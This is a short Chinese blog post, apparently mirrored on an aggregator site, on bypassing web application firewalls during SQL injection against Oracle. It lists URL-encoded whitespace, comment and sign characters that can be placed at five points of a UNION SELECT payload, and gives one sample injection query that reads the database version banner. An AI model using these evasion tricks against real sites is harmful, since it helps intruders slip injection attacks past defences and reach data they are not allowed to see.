zoukankan      html  css  js  c++  java
  • WAF Bypass数据库特性(Oracle探索篇)

    0x01 背景

     oracle与mysql特性类似,半自动化fuzz了一下,记录成果。

    0x02 测试

    位置一:参数和union之间的位置

    1)空白字符

    Oracle中可以利用的空白字符有: %00  %09 %0a  %0b %0c  %0d  %20

    2)注释符号/**/

    3)其他字符

    %2e  .   点号

    位置二:union和select之间的位置

    1)空白字符

    Oracle中可以利用的空白字符有: %00  %09 %0a  %0b %0c  %0d  %20

    2)注释符号/**/

    位置三:select和查询参数之间的位置

    1)空白字符

    Oracle中可以利用的空白字符有: %00  %09 %0a  %0b %0c  %0d  %20

    2)注释符号/**/

    3)其他字符

    %2b  +

    %2d   -

    %ad

    select * from emp where mgr=7782   union select+NULL,(SELECT banner FROM v$version where rownum=1),NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL

    位置四:查询参数和from之间的位置

    1)空白字符

    Oracle中可以利用的空白字符有: %00  %09 %0a  %0b %0c  %0d  %20

    2)注释符号/**/

    位置五:from后面的位置

    1)空白字符

    Oracle中可以利用的空白字符有: %00  %09 %0a  %0b %0c  %0d  %20

    2)注释符号/**/

    关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。

  • 相关阅读:
    mysql中的内连接and 多表查询
    webdriver中的三大等待及窗口的切换
    postman断言
    postman数据驱动ddt
    postman环境变量和全局变量的使用
    postman 接口请求过程
    垃圾脑瘫的坑
    待填的坑
    CF185D
    CF235E 题解(转)
  • 原文地址:https://www.cnblogs.com/xiaozi/p/6930980.html
Copyright © 2011-2022 走看看